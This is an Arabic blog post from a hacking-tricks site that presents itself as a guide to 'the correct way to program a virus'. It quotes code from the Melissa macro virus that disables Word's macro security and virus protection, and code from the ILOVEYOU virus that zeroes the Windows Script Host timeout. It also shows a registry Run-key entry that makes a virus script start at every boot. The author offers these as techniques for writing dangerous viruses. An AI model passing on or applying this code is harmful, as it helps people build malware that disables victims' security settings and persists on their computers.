اعلان

Website

المدونة

ملاحظات يجب قراءتها:

1. نتبرئ من استخدام أي موضوع في المدونة في طريق الحرام أو ضد المسلمين.
2. إن لم تجد الموضوع الذي بحثت عنه في محرك البحث، استخدم البحث الداخلي في المدونة.
3. هناك مراكز رفع ملفات تحتاج الى استعمال بروكسي للتحميل المجاني دون عمل حساب مدفوع مثل مركز رفع uploading.com
4. نعتذر عن عدم توفر بدائل لبعض الروابط المفقودة
5. الرجاء فحص الملفات جيداً قبل التشغيل فيما يخص أدوات الهاكرز و الفيديو..الخ
6. ليست كل البرامج كاملة و ليست كل البرامج تحتاج الى تسجيل!!؟؟
7. عزيزي الزائر تشرفنا بزيارتك، و أعلم أنك لست أول زائر و لن تكون الاخير بإذن الله تعالى، تمتع بتصفح المدونة دون مشاكل بإذن الله...
8. لا تنس استخدام (رسائل اقدم) لرؤية باقي مواضيع التصنيفات

انشاء المدونة

تم انشاء المدونة في:

07\01\2009

Black ice

كل عام و أنتم بألف خير بمناسبة مرور 4 سنوات على انشاء المدونة و الحمدلله

ĬŖŞĤ@ĮĐ مدونة الخدع و الشروحات إرشيد الجرايدة ĬŖŞĤ@ĮĐ

جارٍ التحميل...

الطريقة الصحيحة لبرمجة الفيروس


اول ما يمكن قوله وباختصار ان الفيروسات تكسب قوتها في طريقتها في 

التعامل مع الروجستري لان الرجستري هو قاعدة البيانات للحاسوب وكل

ما تعلمنا كيف نتعامل معه بواسطة احدى لغات البرمجة امكننا ان نبرمج اخطر الفيروسات

بالاضافة الى الدكاء بطبيعة الحال وكما تعلمون ان اشهر الفيروسات نجدها تتعامل مع الروجستري

لتغير مع تحتاجه لنجاح الفيروس كما فعل مبرمج فيروس ميلسا

اول ما فعله هو تنزيل مستوى الحماية في برامج الورد ودالك عن طريق الروجيستري

وهدا متال في فيروس ميليسا

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If


كما تلاحضون انه في البداية تعامل مع الروجستري ليغير قيمه

CommandBars("Macro").Controls("Security...").Enabled = False

هدا الامر يعطل ايقونة الادوات التى منها يمر المستخدم للحماية وبالتالى يرفع مستوى الحماية لديه في برامج الورد
متال في فيرس الحب

rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

اول ما فعله لتسهيل عمل الفيروس هو تغير قيمة التايم اوت الخاصة بالسكربت السطر الاول مخصص لقراءة القيمة 
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout")
فادا
if (rr>=1) then

كانت هده القيمة اكبر من او تساوي واحد اجعلها صفر كما هو مبين في هدا الامر 

wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\
Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

هنا ايضا طريقة طريقة جعل الفيروس يشتغل في كل مرة يشتغل فيها الجهاز وهده هي الطريقة

regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\nom de virus",dirsystem&"\virus.vbs"

اتمنى ان اكون قد قدمت شئ بسيط للمبرمجين
مرسلة بواسطة
التسميات:

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)